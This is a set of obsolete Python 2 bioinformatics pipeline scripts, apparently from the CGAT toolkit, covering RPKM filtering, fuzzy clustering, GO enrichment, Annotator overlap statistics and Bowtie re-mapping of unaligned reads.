background_file = open( background_filename, "w" )
with open( cdt_filename, "w" ) as cdt_file:
counts = E.Counter()
counts.output = 0
for line in open(infile,"r"):
if line.startswith("#"): continue
if line.startswith("gene_id"):
# create cdt file
labels = line.rstrip('\n').split('\t')[2::]
cdt_file.write( "UID\tNAME\tGWEIGHT\t%s\n" % ("\t".join( labels ) ) )
cdt_file.write( "EWEIGT\t\t\t%s\n" % ( "\t".join( ["1"] * len(labels))))
continue
data = line[:-1].split("\t")
counts.input += 1
# exclude genes that are too short
if int(data[1]) < min_gene_len:
counts.skipped_length += 1
continue
name = data[0]
la = map(float, data[2:])
# exclude lowly expressed genes
if max(la) < min_rpkm:
counts.skipped_rpkm += 1
continue
background_file.write(name + "\n")
# to handle any zero values, add 0.01 to every RPKM
la = map(lambda x: x + 0.01, la)
avg_rpkm = float(sum(la) ) / len(la)
ratios = [ math.log( x/avg_rpkm, 2) for x in la]
if max(ratios) < min_diff_threshold:
counts.skipped_diff += 1
continue
cdt_file.write( "%s\t%s\t%i\t%s\n" % (name, name, 1,
"\t".join(map(str,ratios)) ) )
counts.output += 1
background_file.close()
E.info( "%s\n" % str(counts) )
# if there are too few genes to cluster, record the file in fuzzy_k/bad_clusters so that downstream steps skip it
l = len( open(cdt_filename).readlines())
if l - 2 < PARAMS["min_genes_to_cluster"]:
bad_clusters = open('fuzzy_k/bad_clusters','a')
bad_clusters.write( cdt_filename + '\n')
bad_clusters.close()
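# --- editor note: the ratio transform above on a toy RPKM row (hypothetical values).
# After adding 0.01 to avoid zeros, each value is divided by the row mean and
# log2-transformed, so a gene at twice its average expression scores about +1 and a
# gene at half its average about -1; e.g. [2.01, 4.01, 8.01] has mean ~4.68 and gives
# ratios of roughly [-1.22, -0.22, 0.78].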
@transform( buildCDTFiles,
regex(r"all-(.*).cdt"),
(r"instructions-\1", r"centroids-\1", r"membership-\1" ) )
def buildClusters( infiles, outfiles ):
'''run c-means clustering on expression level data.'''
to_cluster = USECLUSTER
job_options = "-l mem_free=10G"
# ignore the background file (why is it included in infiles?)
infile, _ = infiles
instructions_filename, centroid_filename, membership_filename = outfiles
instructions_filename = os.path.abspath( instructions_filename )
cdt_filename = os.path.abspath( infile )
kmeans_clusters = PARAMS["kmeans_clusters"]
# run aerie in a temporary directory
tmpdir = P.getTempDir(".")
with open( instructions_filename, "w" ) as outf:
outf.write( '''load %(cdt_filename)s
fuzzy %(kmeans_clusters)i
%(tmpdir)s/all
exit
''' % locals())
statement = '''
aerie < %(instructions_filename)s >& %(instructions_filename)s.log
'''
P.run()
try:
shutil.move( os.path.join( tmpdir, "all.fct"), centroid_filename )
shutil.move( os.path.join( tmpdir, "all.mb"), membership_filename )
except IOError,msg:
E.warn("no results for %s,%s: %s" % (centroid_filename,
membership_filename,
msg))
P.touch( centroid_filename )
P.touch( membership_filename )
shutil.rmtree( tmpdir )
def getBadClusters():
'''return a list of runs that should not be submitted to clustering.'''
try:
bad_clusters=[ x[:-1] for x in open('fuzzy_k/bad_clusters','r').readlines()]
except IOError:
bad_clusters = []
return bad_clusters
# extract & calculate enrichments in fuzzyK clusters over the background sets;
# extract for several different cutoffs of "membership"
# note some clusters may be degenerate (NEED ANOTHER SCRIPT TO PREPROCESS!)...
def generate_fuzzy_clusters_params():
bad_clusters=getBadClusters()
for min_rpkm in PARAMS["min_rpkm"]:
for min_diff in PARAMS["min_diff"]:
for cluster_lvl in PARAMS["cluster_lvl"]:
if not "fuzzy_k/all-%s-%s.pcl" % (min_rpkm, min_diff) in bad_clusters:
yield [ "fuzzy_k/membership-%s-%s" % (min_rpkm, min_diff), "fuzzy_k/cluster-%s-%s-%s.0" % (min_rpkm, min_diff, cluster_lvl), cluster_lvl ]
@follows( buildClusters )
@files( generate_fuzzy_clusters_params )
def extractClusters(infile, outfile, param0 ):
'''build fuzzy clusters.'''
to_cluster = USECLUSTER
outp = outfile.rsplit('.',1)[0]
statement = '''
python %(rmaadir)s/extract_clusters.py %(infile)s %(outp)s %(param0)s
'''
P.run()
def generate_fuzzy_enrich_params():
'''find enrichments.'''
bad_clusters=getBadClusters()
for min_rpkm, min_diff, cluster_lvl in \
itertools.product( PARAMS["min_rpkm"], PARAMS["min_diff"], PARAMS["cluster_lvl" ] ):
for dbname, location in P.asDict("databases").iteritems():
if "fuzzy_k/all-%s-%s.pcl" % (min_rpkm, min_diff) in bad_clusters: continue
yield [ ["fuzzy_k/background-%s-%s" % (min_rpkm, min_diff),
glob.glob("fuzzy_k/cluster-%s-%s-%s.*" % (min_rpkm, min_diff, cluster_lvl)), location],
["fuzzy_k/%s-summary-cluster-%s-%s-%s.0" % (dbname, min_rpkm, min_diff, cluster_lvl),
"fuzzy_k/%s-expanded-cluster-%s-%s-%s.0" % (dbname, min_rpkm, min_diff, cluster_lvl)] ]
@follows( extractClusters )
@files( generate_fuzzy_enrich_params )
def computeEnrichments(infiles, outfiles):
'''extract enrichments.'''
to_cluster = USECLUSTER
background_filename, foreground_filenames, association_filename = infiles
for foreground_filename in foreground_filenames:
cluster = foreground_filename.rsplit('.',1)[1]
summary_filename = outfiles[0].rsplit('.',1)[0]+'.'+cluster
expanded_filename = outfiles[1].rsplit('.',1)[0]+'.'+cluster
statement = '''
python %(rmaadir)s/compute_enrichments.py
%(foreground_filename)s
%(background_filename)s
%(association_filename)s
%(summary_filename)s
%(expanded_filename)s
'''
P.run()
def generate_enrichments_high_expn_params():
for min_rpkm in PARAMS["min_rpkm_tree"]:
for dbname, location in P.asDict("databases").iteritems():
yield [ ['mappings/unique.rpkm.all', location],
"high_expn/high_expn.%s.%s" % (dbname, min_rpkm), min_rpkm ]
@follows( calculateRPKMs, mkdir("high_expn") )
@files(generate_enrichments_high_expn_params)
def computeEnrichmentsHighlyExpressedGenes( infiles, outfile, min_rpkm):
to_cluster = USECLUSTER
rpkm_filename, association_filename = infiles
statement = '''cat %(rpkm_filename)s
| sed 1d
| awk '{ print $1 }'
> %(outfile)s.background
'''
P.run()
statement = '''cat %(rpkm_filename)s
| awk '{ sum=0; for(i=3; i<=NF; i++) { sum += $i}; sum/=(NF-2); if (sum> %(min_rpkm)i) print $1 }'
> %(outfile)s.foreground
'''
P.run()
statement = '''
python %(rmaadir)s/compute_enrichments.py
%(outfile)s.foreground
%(outfile)s.background
%(association_filename)s
%(outfile)s
%(outfile)s.expanded
'''
P.run()
# Calculate results of all enrichments. For each database, find the best combination of parameters and report this file to a final analysis directory along with the relevant reference files.
def generate_params_report():
for dbname, location in P.asDict("databases").iteritems():
yield [glob.glob("fuzzy_k/%s-summary-cluster-*-*-*.*" % dbname),
"best_conditions/clustering_summary_%s.txt" % dbname]
@follows( computeEnrichments, mkdir("best_conditions") )
@files( generate_params_report )
def reportBestParams(infiles, outfile):
'''report the best parameters.'''
bestfile = ''
bestnumb = 0
outf = open(outfile, 'w')
numbs = {}
fdr = PARAMS["fdr"]
for infile in infiles:
pref = infile.rsplit('.',1)[0]
numbs[pref] = numbs.get( pref, 0 )
numb = 0
with open(infile,"r") as inf:
for line in inf:
if line.startswith("Name"): continue
l = line[:-1].split("\t")
# stop at the first entry at or above the FDR threshold (entries are assumed to be sorted by FDR)
if float(l[3]) >= fdr: break
numb += 1
numbs[pref] += numb
outf.write( infile + '\t' + str(numb) + '\n' )
if numbs[pref] > bestnumb:
bestnumb = numbs[pref]
bestfile = infile
prefix = bestfile.rsplit('.',1)[0]
for x in glob.glob( "%s.*"% prefix ):
shutil.copyfile( x, "best_conditions/%s" % os.path.basename(x) )
a = bestfile.rsplit('.',1)[0].rsplit('-',3)[1]
b = bestfile.rsplit('.',1)[0].rsplit('-',3)[2]
for x in glob.glob( "fuzzy_k/centroids-%s-%s" % (a,b) ):
shutil.copyfile( x, "best_conditions/%s" % os.path.basename(x) )
def generate_params_totalRNAfunctions():
for dbname, location in P.asDict("databases").iteritems():
yield [['mappings/unique.rpkm.all', location],
["overall_annotations/totalRNA.%s" % dbname,
"overall_annotations/totalRNA_diffs.%s" % dbname]]
@follows( calculateRPKMs, mkdir("overall_annotations") )
@files( generate_params_totalRNAfunctions )
def reportTotalRNAFunctions(infiles, outfiles):
'''report total RNA functions.'''
to_cluster = USECLUSTER
rpkm_filename, annotations_filename = infiles
expression_filename, diff_filename = outfiles
statement = '''
python %(rmaadir)s/report_totalRNA_annotations.py
%(rpkm_filename)s
%(annotations_filename)s
%(expression_filename)s
%(diff_filename)s
'''
P.run()
@follows( makeTreesAllGenes,
combineJunctions,
combineBams,
uniquifyBams,
combineGeneModels,
compareGeneModels,
calculateRPKMs,
calculateRPKMsMulti,
mkdir("web") )
def basic(): pass
@follows( computeEnrichmentsHighlyExpressedGenes,
reportTotalRNAFunctions,
reportBestParams )
def analysis(): pass
@follows( basic, analysis )
def full(): pass
@follows( makeBigwigs,
makeBigwigsMulti )
def export(): pass
if __name__== "__main__":
sys.exit( P.main(sys.argv) )
```
#### File: obsolete/pipeline_rmaa/sort_genes_by_rel_std_dev.py
```python
from sys import argv
from math import sqrt
rpkm_file = open(argv[1],'r')
min_rpkm = float(argv[2])
def calc_rel_std_dev(values):
# relative standard deviation (coefficient of variation): standard deviation / mean
variance = 0.0
mean = float(sum(values))/len(values)
for val in values:
variance += (val-mean)**2
variance /= len(values)
return sqrt(variance)/mean
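# editor note: quick sanity check with hypothetical values - for [2.0, 4.0, 6.0] the
# mean is 4.0 and the standard deviation is sqrt(8/3) ~ 1.63, so the relative standard
# deviation returned above is ~0.41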
by_variance=[]
rpkm_file.readline()
for line in rpkm_file:
la = line.rstrip('\n').split('\t')
if max( map(float, la[2::]) ) < min_rpkm:
continue
by_variance.append( (calc_rel_std_dev( map(float, la[2::]) ), la) )
by_variance.sort()
by_variance.reverse()
for entry in by_variance:
print str(entry[0]) + "\t" + "\t".join(entry[1])
```
#### File: cgat/obsolete/pipeline_vitaminD_annotator.py
```python
import sys
import re
import os
import tempfile
import collections
import shutil
import CGAT.Experiment as E
import CGAT.Pipeline as P
import sqlite3
import gff2annotator
PARAMS = P.getParameters()
############################################################
############################################################
############################################################
## Annotator utility functions
############################################################
def buildAnnotatorWorkSpace( tmpdir, outfile, workspaces=("genomic",), gc_control = False ):
'''write genomic workspace.'''
to_cluster = True
job_options = "-l mem_free=4000M"
tmpworkspaces = []
if gc_control:
tmpworkspace = os.path.join( tmpdir, "workspace_gc" )
tmpsynonyms = os.path.join( tmpdir, "synonyms" )
tmpworkspaces.append( tmpworkspace )
statement = '''
awk '{ printf("%%s\\t%%s\\t%%s\\t%%s.%%s\\n", $1,$2,$3,$1,$4)}' < %(annotator_gc)s |\
python %(scriptsdir)s/bed2gff.py |\
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--output-filename-synonyms=%(tmpsynonyms)s \
--max-length=0 \
--log=%(outfile)s.log \
> %(tmpworkspace)s'''
P.run()
else:
tmpsynonyms = None
for workspace in workspaces:
tmpworkspace = os.path.join( tmpdir, "workspace_%s" % workspace )
if workspace == "genomic":
statement = '''
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
< %(genome)s.gff > %(tmpworkspace)s
'''
elif workspace == "promotors":
statement = '''
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
< %(promotors)s > %(tmpworkspace)s
'''
elif workspace == "promotors-go":
# promotors with GO categories
statement = '''cat < %(promotors)s |\
python %(scriptsdir)s/gtf2gtf.py \
--filter=gene \
--apply=<(cut -f 2 < %(gofile)s | sort | uniq ) |\
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
> %(tmpworkspace)s
'''
elif workspace == "gene-territories":
statement = '''
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
< %(annotator_geneterritories)s > %(tmpworkspace)s
'''
elif workspace == "mappable":
statement = '''
python %(scriptsdir)s/bed2gff.py < %(annotator_mappability)s |\
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
> %(tmpworkspace)s
'''
else:
raise P.PipelineError("unknown workspace '%s'" % workspace )
P.run( **dict( locals().items() + PARAMS.items() ) )
tmpworkspaces.append( tmpworkspace )
return tmpworkspaces, tmpsynonyms
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorAnnotations( tmpdir, outfile,
annotations=None,
bedfiles = None,
gofile = None):
'''write annotations.'''
tmpannotations = os.path.join( tmpdir, "annotations" )
to_cluster = True
job_options = "-l mem_free=4000M"
if annotations == "architecture":
statement = '''
cat %(promotors)s %(annotation)s |\
python %(scriptsdir)s/gff2annotator.py \
--section=annotations-gff \
--log=%(outfile)s.log \
> %(tmpannotations)s
'''
elif annotations=="go":
statement = '''
cat %(annotator_geneterritories)s |\
python %(scriptsdir)s/gff2annotator.py \
--section=annotations-go \
--input-filename-map=<(cut -f 2,4 < %(gofile)s) \
--log=%(outfile)s.log \
> %(tmpannotations)s
'''
elif bedfiles:
bedfiles = " ".join(bedfiles)
statement = '''
cat %(bedfiles)s |\
python %(scriptsdir)s/bed2annotator.py \
--max-length=0 \
--merge \
--section=annotations \
--log=%(outfile)s.log \
> %(tmpannotations)s
'''
else:
raise P.PipelineError("unknown annotations '%s'" % workspace )
P.run()
return tmpannotations
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorSegments( tmpdir, infile, outfile ):
'''convert segments in bed format to annotator format
from infile to outfile.
'''
tmpsegments = os.path.join( tmpdir, "segments" )
to_cluster = True
statement = '''
python %(scriptsdir)s/bed2gff.py < %(infile)s |\
python %(scriptsdir)s/gff2annotator.py --log=%(outfile)s.log --section=segments > %(tmpsegments)s \
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
return tmpsegments
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorSegmentsFromDatabase( tmpdir, track,
outfile,
with_motif = None,
without_motif = None,
proportion = None):
'''output segments in annotator format.
with_motif
only output segments matching the motif
without_motif
only output segments not matching the motif
proportion
only output top x percent of segments (peakval). If the
proportion is negative, the bottom x percent are output.
For example, proportion=-33 outputs the third of intervals
with the smallest peakval.
'''
tmpsegments = os.path.join( tmpdir, "segments" )
to_cluster = True
dbhandle = sqlite3.connect( PARAMS["database"] )
if with_motif:
statement = '''
SELECT i.contig, i.start, i.end, i.interval_id, i.peakval
FROM %(track)s_intervals AS i, %(track)s_mast AS m
WHERE i.interval_id = m.id
AND m.motif = '%(with_motif)s'
AND m.nmatches > 0
ORDER by i.contig, i.start''' % locals()
elif without_motif:
statement = '''
SELECT i.contig, i.start, i.end, i.interval_id, i.peakval
FROM %(track)s_intervals AS i, %(track)s_mast AS m
WHERE i.interval_id = m.id
AND m.motif = '%(without_motif)s'
AND m.nmatches = 0
ORDER by i.contig, i.start''' % locals()
elif proportion != None:
statement = '''SELECT COUNT(*) FROM %(track)s_intervals AS i'''
cc = dbhandle.cursor()
cc.execute( statement % locals() )
total = cc.fetchall()[0][0]
cutoff = int(float(total) * (abs(proportion) / 100.0))
if proportion > 0:
statement = '''
SELECT i.contig, i.start, i.end, i.interval_id, i.peakval
FROM %(track)s_intervals AS i
ORDER BY i.peakval DESC LIMIT %(cutoff)i
''' % locals()
else:
statement = '''
SELECT i.contig, i.start, i.end, i.interval_id, i.peakval
FROM %(track)s_intervals AS i
ORDER BY i.peakval ASC LIMIT %(cutoff)i
''' % locals()
cc = dbhandle.cursor()
try:
cc.execute( statement )
except sqlite3.OperationalError, msg:
E.warn( "error in sql statement: %s" % msg)
return None
contigs = collections.defaultdict( list )
for result in cc:
contig, start, end, interval_id,peakval = result
contigs[contig].append( (start,end) )
outs = open(tmpsegments, "w" )
gff2annotator.outputSegments( outs, contigs,
section = "segments" )
outs.close()
return tmpsegments
############################################################
############################################################
############################################################
##
############################################################
def runAnnotator( tmpdir, outfile,
tmpannotations,
tmpsegments,
tmpworkspaces,
tmpsynonyms,
options = ""):
'''run annotator.'''
if tmpsegments == None:
E.warn( "no segments - annotator not run for %s" % outfile )
return
if tmpannotations == None:
E.warn( "no annotations - annotator not run for %s" % outfile )
return
to_cluster = True
job_queue = "medium_jobs.q"
job_options = "-l mem_free=8000M"
workspace_options = ""
for x,workspace in enumerate( tmpworkspaces ):
if x == 0:
workspace_options += " -workspace %s" % workspace
else:
workspace_options += " -workspace%i %s" % (x+1, workspace)
if tmpsynonyms:
workspace_options += " -synonyms %s" % tmpsynonyms
statement = '''
java -Xmx8000M -cp %(annotator_dir)s/commons-cli-1.0.jar:%(annotator_dir)s/Annotator.jar app.Annotator \
-verbose 4 -iterations %(annotator_iterations)s \
-annotation %(tmpannotations)s \
-segments %(tmpsegments)s \
%(workspace_options)s \
%(options)s \
> %(outfile)s '''
P.run()
############################################################
############################################################
############################################################
## import annotator GO results
############################################################
def genericImportAnnotator( infiles, outfile, table, workspace, slice, subset, fdr_method ):
'''generic import of annotator results.
Assumes that the suffix of all infiles is the same.
'''
infile = " ".join(infiles)
x, suffix = os.path.splitext( infiles[0] )
tmpfilename = P.getTempFilename()
statement = '''
python %(scriptsdir)s/annotator.py \
--method=fdr-table \
--fdr-method=%(fdr_method)s \
--log=%(outfile)s.log \
--regex-id="(.*)%(suffix)s" \
%(infile)s > %(tmpfilename)s
'''
P.run()
tmpfile = P.getTempFile()
for line in open( tmpfilename, "r" ):
if line.startswith("id"):
line = "subset\tworkspace\tslice\t" + re.sub("^id", "track", line)
else:
line = "%s\t%s\t%s\t%s" % (subset, workspace, slice, line)
tmpfile.write(line)
tmpfile.close()
tmpfilename2 = tmpfile.name
statement = '''
python %(scriptsdir)s/csv2db.py %(csv2db_options)s \
--table=%(table)s
< %(tmpfilename2)s > %(outfile)s'''
P.run()
os.unlink( tmpfilename )
os.unlink( tmpfilename2 )
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorGO( infile, outfile, gofile, workspace ):
'''check statistical overlap between intervals and genomic
segments having GO assignments.
workspace should be ``promotors`` or ``gene-territories``
'''
to_cluster = True
# require 4Gb of free memory
job_options = "-l mem_free=4000M"
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
annotations = buildAnnotatorAnnotations( tmpdir,
outfile,
annotations="go",
gofile = gofile )
# take only those promotors with GO categories for workspace
workspaces, synonyms = buildAnnotatorWorkSpace(
tmpdir, outfile,
workspaces = ("mappable", workspace),
gc_control=True )
segments = buildAnnotatorSegments( tmpdir, infile, outfile )
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms )
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorSegmentsROI( tmpdir, roi_class, outfile, overlap = None ):
'''convert segments in bed format to annotator format
from infile to outfile.
'''
tmpsegments = os.path.join( tmpdir, "segments" )
to_cluster = True
dbhandle = sqlite3.connect( PARAMS["database"] )
if overlap:
statement = '''
SELECT roi.contig, roi.start, roi.end
FROM regions_of_interest AS roi,
%(overlap)s_intervals AS i
WHERE roi.class='%(roi_class)s' AND
i.contig = roi.contig AND
min(roi.end, i.end) - max(roi.start, i.start) > 0
'''
else:
statement = '''
SELECT roi.contig, roi.start, roi.end
FROM regions_of_interest AS roi
WHERE class='%(roi_class)s'
'''
cc = dbhandle.cursor()
cc.execute( statement % locals() )
noutput = 0
contigs = collections.defaultdict( list )
for result in cc:
contig, start, end = result
contigs[contig].append( (start,end) )
noutput += 1
E.info("segments for roi_class `%s` and overlap `%s`: %i" % (roi_class, overlap, noutput))
outs = open(tmpsegments, "w" )
gff2annotator.outputSegments( outs, contigs,
section = "segments" )
outs.close()
if noutput == 0:
return None
else:
return tmpsegments
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorROIGO( roi_class, outfile, gofile, workspace, overlap = None ):
'''check statistical overlap between intervals and genomic
segments having GO assignments.
workspace should be ``promotors`` or ``gene-territories``
'''
to_cluster = True
# require 4Gb of free memory
job_options = "-l mem_free=4000M"
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
segments = buildAnnotatorSegmentsROI( tmpdir,
roi_class,
outfile,
overlap = overlap )
if segments == None:
E.info("no segments for roi_class `%s` and overlap `%s` - no computation." %(roi_class,
overlap ))
return
annotations = buildAnnotatorAnnotations( tmpdir,
outfile,
annotations="go",
gofile = gofile )
# take only those promotors with GO categories for workspace
workspaces, synonyms = buildAnnotatorWorkSpace(
tmpdir, outfile,
workspaces = (workspace,),
gc_control=True )
# these are large segments, so increase bucket size
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms,
"-bucketsize 100" )
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorArchitecture( infile, outfile, **kwargs ):
'''check statistical overlap between intervals and other genomic features
defined in the file PARAMS["annotations"].
Annotator is run with the following parameters:
1. Segments: the interval track
2. Annotations:
1. genomic architecture (PARAMS["annotation"])
2. promotors (PARAMS["promotors"])
3. Workspace: the full genome
'''
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
track = infile[:-len(".bed")]
if kwargs:
segments = buildAnnotatorSegmentsFromDatabase( tmpdir,
track, outfile,
**kwargs )
else:
segments = buildAnnotatorSegments( tmpdir, infile, outfile )
workspaces, synonyms = buildAnnotatorWorkSpace( tmpdir, outfile,
workspaces = ("mappable","genomic"),
gc_control=True )
annotations = buildAnnotatorAnnotations( tmpdir, outfile, annotations="architecture" )
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms )
shutil.rmtree( tmpdir )
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorTracks( infiles, outfile, **kwargs ):
'''check statistical overlap between intervals and selected ucsc tracks
Annotator is run with the following parameters:
1. Segments: the interval track
2. Annotations:
1. ucsc encode features
2. disease intervals (regions of interest)
3. Workspace: the full genome
'''
infile, infile_annotations = infiles
track = infile[:-len(".bed")]
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
if kwargs:
segments = buildAnnotatorSegmentsFromDatabase( tmpdir,
track, outfile,
**kwargs )
else:
segments = buildAnnotatorSegments( tmpdir, infile, outfile )
workspaces, synonyms = buildAnnotatorWorkSpace( tmpdir, outfile,
workspaces = ("mappable","genomic"),
gc_control = True )
annotations = buildAnnotatorAnnotations( tmpdir, outfile, bedfiles=(infile_annotations,) )
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms )
shutil.rmtree( tmpdir )
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorRegionsOfInterest( infiles, outfile, **kwargs ):
'''check statistical overlap between intervals and regions of interest.
Annotator is run with the following parameters:
1. Segments: the interval track
2. Annotations:
1. disease intervals (regions of interest)
3. Workspace: mappable part of gene territories
'''
infile, infile_regions = infiles
track = infile[:-len(".bed")]
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
annotations = buildAnnotatorAnnotations( tmpdir, outfile, bedfiles=(infile_regions,) )
workspaces, synonyms = buildAnnotatorWorkSpace( tmpdir,
outfile,
workspaces = ("mappable", "gene-territories"),
gc_control = True )
if kwargs:
segments = buildAnnotatorSegmentsFromDatabase( tmpdir,
track, outfile,
**kwargs )
else:
segments = buildAnnotatorSegments( tmpdir, infile, outfile )
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms )
shutil.rmtree( tmpdir )
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorDistanceAnnotations( annotations = "expression" ):
'''build an annotations file for annotator_distance.'''
tmpfile = P.getTempFile( "." )
tmpfilename = tmpfile.name
if annotations == "expression":
dbhandle = sqlite3.connect( PARAMS["database"] )
cc = dbhandle.cursor()
statement = """
SELECT gene_id,
CASE WHEN %(annodist_master_expression_select)s THEN 'responsive' ELSE 'nonresponsive' END
FROM probeset2transcript AS e,
%(annodist_master_expression)s AS d
WHERE d.cluster_id = e.cluster_id
""" % dict( locals().items() + PARAMS.items() )
data = cc.execute( statement ).fetchall()
tmpfile.write("gene_id\tlabel\n" )
for gene_id, label in data: tmpfile.write("%s\t%s\n" % (gene_id, label ) )
tmpfile.close()
return tmpfilename
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorDistance( infile,
outfile,
builder,
workspace,
workspace_label="direction",
annotations = None ):
'''check statistical association between intervals and
transcription start sites.
'''
to_cluster = True
target_path = os.path.join( os.path.abspath( PARAMS["exportdir"] ),
"annotator_distance",
outfile )
if os.path.exists( target_path): shutil.rmtree( target_path)
try:
os.makedirs( target_path )
except OSError:
pass
options = []
if annotations:
options.append( "--filename-annotations=%s" % annotations )
options = " ".join( options )
statement = '''
python %(scriptsdir)s/annotator_distance.py \
--workspace=%(workspace)s \
--segments=%(infile)s \
--segments-format=bed \
--counter=%(annodist_counter)s \
--workspace-label=%(workspace_label)s \
--sampler=permutation \
--transform-counts=cumulative \
--logscale=x \
--remove-overhangs \
--analysis=proximity \
--num-samples=%(annodist_iterations)i \
--num-bins=%(annodist_bins)i \
--hardcopy=%(target_path)s/%%s.png \
--output-filename-pattern=%(target_path)s/%%s.table \
--workspace-builder=%(builder)s \
--resolution=%(annodist_resolution_intergenic)s \
--plot
%(options)s < /dev/null > %(outfile)s'''
P.run()
```
#### File: cgat/obsolete/pipeline_vitaminD_compare.py
```python
import sys
import tempfile
import optparse
import shutil
import itertools
import csv
import math
import random
import re
import glob
import os
import collections
import CGAT.Experiment as E
import CGAT.Pipeline as P
from ruffus import *
import sqlite3
import CGAT.IOTools as IOTools
import pysam
import numpy
import gzip
PARAMS=P.getParameters()
VERSIONS = ("version1", "version2", "version3", "version4", "version5")
@transform( "version1_*.bed", suffix(".bed"), ".compare")
def compare( infile, outfile ):
'''compare several bed-files.'''
pattern = re.match("version\d+_(.*).bed", infile).groups()[0]
files = " ".join( sorted(glob.glob( "version*_%s.bed" % pattern )) )
statement = '''
python %(scriptsdir)s/diff_bed.py %(files)s > %(outfile)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
@transform( "version1_*.bed", suffix(".bed"), ".rest")
def difference_to1( infile, outfile ):
'''compare several bed-files. List the number of intervals that are not present in the other versions
compared to version 1.'''
track = re.match("version\d+_(.*).bed", infile).groups()[0]
tmpfile = P.getTempFilename()
for version in VERSIONS:
t = tmpfile + "%s" % version
if version == "version1":
statement = '''cut -f 5 < %(version)s_%(track)s.bed |\
python %(toolsdir)s/data2histogram.py --headers=%(version)s --bin-size=1 --min-value=1 > %(t)s
'''
else:
statement = '''
intersectBed -v -a version1_%(track)s.bed -b %(version)s_%(track)s.bed | cut -f 5 |\
python %(toolsdir)s/data2histogram.py --headers=%(version)s --bin-size=1 --min-value=1 > %(t)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
statement = '''
python %(toolsdir)s/combine_tables.py --sort-keys=numeric %(tmpfile)s* > %(outfile)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
@transform( "version2_*.bed", suffix(".bed"), ".rest2")
def difference_to2( infile, outfile ):
'''compare several bed-files.'''
track = re.match("version\d+_(.*).bed", infile).groups()[0]
tmpfile = P.getTempFilename()
for version in VERSIONS:
t = tmpfile + "%s" % version
if version == "version2":
statement = '''cut -f 5 < %(version)s_%(track)s.bed |\
python %(toolsdir)s/data2histogram.py --headers=%(version)s --bin-size=1 --min-value=1 > %(t)s
'''
else:
statement = '''
intersectBed -v -a version2_%(track)s.bed -b %(version)s_%(track)s.bed | cut -f 5 |\
python %(toolsdir)s/data2histogram.py --headers=%(version)s --bin-size=1 --min-value=1 > %(t)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
statement = '''
python %(toolsdir)s/combine_tables.py --sort-keys=numeric %(tmpfile)s* > %(outfile)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
if __name__== "__main__":
sys.exit( P.main(sys.argv) )
```
#### File: cgat/obsolete/pipeline_vitaminDMHC.py
```python
CONTIG,START,END = "chr6", 28000000,34000000
import sys
import os
import glob
import tempfile
import optparse
import shutil
import itertools
import random
from ruffus import *
import CGAT.Experiment as E
import CGAT.Pipeline as P
import CGAT.IndexedFasta as IndexedFasta
import CGAT.IndexedGenome as IndexedGenome
import pysam
import pipeline_vitaminD
PARAMS = pipeline_vitaminD.PARAMS
############################################################
############################################################
############################################################
@files( (("genome.fasta", 'subsequence.fasta'),) )
def extractSequence( infile, outfile ):
'''extract genomic sequence to be aligned against.'''
fasta = IndexedFasta.IndexedFasta( infile[:-len(".fasta")] )
outs = open( outfile,"w")
outs.write( ">%s\n%s\n" % (CONTIG, fasta.getSequence( CONTIG, "+", START, END) ))
outs.close()
############################################################
############################################################
############################################################
@files_re( extractSequence, '(.*).fasta', r'\1.ebwt')
def buildBowtieIndex( infile, outfile ):
statement = '''bowtie-build %(infile)s %(outfile)s > %(outfile)s'''
P.run( **dict( locals().items() + PARAMS.items() ) )
############################################################
############################################################
############################################################
@follows( extractSequence, buildBowtieIndex)
@files_re( '../*.bam', '../(.*).bam', (r"../\1.bam", "subsequence.ebwt"), r"\1.bam" )
def remapWithBowtie( infiles, outfile ):
'''re-map unaligned reads.
Select those reads that have not been mapped from a bam file (flag-value = 4)
and map again with Bowtie.
'''
to_cluster = True
tmpfilename = P.getTempFilename()
prefix = outfile[:-len(".bam")]
infile, subsequence = infiles
start = START
statement = '''
samtools view %(infile)s |\
awk '$2 == 4 {printf("@%%s\\n%%s\\n+\\n%%s\\n", $1,$10,$11);}' |\
bowtie --sam -n 3 %(subsequence)s - 2>%(outfile)s.log |\
awk -v OFS="\\t" '/^@/ {print;next;} {if ($4 > 0) { $4 += %(start)s } print; }' |\
samtools import %(genome)s - %(tmpfilename)s >& %(outfile)s.log;
samtools sort %(tmpfilename)s %(prefix)s;
samtools index %(outfile)s;
rm -f %(tmpfilename)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
if os.path.exists( tmpfilename ):
os.unlink( tmpfilename )
@files_re( remapWithBowtie,
"(.*).bam",
r"\1.bigwig" )
